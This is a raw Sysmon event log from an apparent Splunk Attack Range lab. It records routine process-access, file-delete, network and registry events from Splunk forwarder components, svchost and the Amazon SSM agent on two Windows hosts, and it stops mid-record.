08:04:36.550{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083967Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:36.550{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083966Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:36.550{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083965Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:36.550{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083964Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:36.550{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083963Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:36.550{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083962Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:36.550{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083961Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:36.550{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B594-615A-A901-00000000FD01}3116C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000083960Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:36.550{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B594-615A-A901-00000000FD01}3116C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000083959Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:36.550{2FDD8D40-B594-615A-A901-00000000FD01}3116C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000083958Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:36.473{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A4FDDF05CD26346E094B7B0AE1B1DA75,SHA256=E1109A2009DDDA4B9794C9C8BDA1FAD7AAA614CBB0400ACBE67D8656BBEE1D7B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083957Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:36.239{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=177AD014812C9B6EF4B4EB88468EA72F,SHA256=2CB6BFFCA9114FD6B15CDE6CCDE869E5DBC8C070AAFAEC993F8E2DE40FD29AF9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108437Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:36.381{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49893E774D192E30A989CB49450EA894,SHA256=07E9B12894E3CAE5E661D5033ED0B98DA66019C59501855F6E477E847BA9398B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108438Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:37.396{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EAC23116A9A1F89CDC5E8851B71840C3,SHA256=F4AC2F1BF6DDA591B62E2725A185E312B2CCD8A3FEB155881428FB0909A1D454,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083974Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:37.612{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=76089F60C3647C6874302973FF3A45BD,SHA256=C39260B4102B32DBD5CB36977125D4F490EE4E512A9CF1A6EACADD26F686B661,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083973Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:37.269{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D47B4EBB248457145D6F23C2854BC7C3,SHA256=7A784089DC6F091431D4F56137170738C8229B7CC021A72C4F6B685F749F83C8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000108440Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:37.458{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51967-false10.0.1.12-8000- 23542300x8000000000000000108439Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:38.411{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A10B2472E4BABCFD44B3DE301B8A8D5,SHA256=2922A5552977CD76CF82BF3F82648FAF3A7A518653232185C1214E19075EDB7E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083975Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:38.300{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=710FD8F73CDBC1453DBE4794DA202B39,SHA256=CEB200A62579D912BA4444D825E3B724EEE4514925683C15984F7DA9743F67F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108441Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:39.426{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=646FDED5327D53101A056BCDF07D28B4,SHA256=0AB934C8F26CDFBC54FDF7558BEEB9431C013A8A9C9B8D48AE31E754A1A30377,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083977Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:37.593{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50203-false10.0.1.12-8000- 23542300x800000000000000083976Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:39.331{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38594D1F0969B10CB4430B9536F7F45A,SHA256=644CF3015E2A2BA7EAFFC4AE96A8CB52878800D6F5215C1B6238637C25CFD076,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108444Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:40.460{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E66ED9C9286D207AC24603C37B5F816B,SHA256=870AF78D1348D5BFB4BA1C6846F6DAE3E7ECBAF048ADD9C77D4B4B1BFFD91238,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083978Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:40.378{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF573FC9A4699EF0747B19C701B9195B,SHA256=65247C854F851FB6E20D17B1A7C68F3FA3A4EB7EA530A82E23E4C30E85417E05,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000108443Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:40.426{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x8000000000000000108442Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 08:04:40.094{58E9C193-ACA7-615A-1400-00000000FC01}940C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7b8f6-0x7b4edb7b) 23542300x800000000000000083979Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:41.409{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9434921BB68BCD364ABC1244FADDB053,SHA256=A1765070BBA1C1AACB087B234CE5E9526359C8552EA3034923B9192D1657C999,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108445Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:41.478{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E82ADD901247FB1921E8882E7C24EB54,SHA256=6B4A741AC3E152390E27E27DA67086A6B59878B10B28A611D80A8017326DCDF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083980Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:42.550{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE2838509D93A67E4FA80A40C1E3BFAD,SHA256=BEA520202FF113B9728F15D7C25D90A6F12198002FFF5F858FE75005A6708C62,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108447Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:42.480{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1D561A35E2A81C09431211E9A5D647F,SHA256=04AB140B08927B65D4086F91966722CF0E301549493055749E8CAB1B0082D5F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108446Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:42.164{58E9C193-ACB4-615A-2800-00000000FC01}2932NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0820d8563ae6a39aa\channels\health\respondent-20211004072647-036MD5=53085563A3ABB9F3808759992432B215,SHA256=10E8415EFF195E3F3A29733AD6341E818F88D003F4EF1749654882A61D67B63B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000108451Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:42.506{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51968-false10.0.1.12-8000- 23542300x8000000000000000108450Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:43.495{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06BEBE08A2B519FB6410351B621ACA35,SHA256=59796AC2E22544F5D213446E8C2FE96EDDED67EB661B0E904DF7C083530D6D17,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083981Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:43.565{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95A72859A8EE57E24BB6E9BA3E2DD3EE,SHA256=35C08CDF7CAB8AFA87AA16EAF19F4E79E2B057BF49251E8016ADF8FFDC9C255C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000108449Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:43.295{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-B428-615A-0D02-00000000FC01}6872C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000108448Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:43.181{58E9C193-ACB4-615A-2800-00000000FC01}2932NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0820d8563ae6a39aa\channels\health\surveyor-20211004072645-037MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108452Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:44.510{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A70077B3FEFD5EBE5113BDBA22B22A6F,SHA256=DE544DF6D1250BB66D954930BCCCB579D50565BFAE090FA89CB9966077E0592F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083984Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:44.659{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=825D0549F7F253C9F3EB7FF1EAA1B2EB,SHA256=E8689ADE7C5173FF11931ADE6B67EC49F987DC905A63D845A0E5F0479A30AC8A,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000083983Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 08:04:44.222{2FDD8D40-AC9A-615A-1000-00000000FD01}960C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7b8f6-0x7dc4a0ca) 354300x800000000000000083982Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:42.624{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50204-false10.0.1.12-8000- 23542300x8000000000000000108453Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:45.511{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F1CF3A3F3B99375518EA02B5CA56867,SHA256=4D8ED59C7E4CFAC628EA145CBBE40ACD90AB4F9E12BE242114E3964CF6CD77E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083985Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:45.659{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=670CDB0660BFC90330A20F7BDEB41637,SHA256=03FAFFE4B78F7FD40A6845F2D976256B7DDA465913344D517B1DD2E634DF2D7B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083986Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:46.659{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 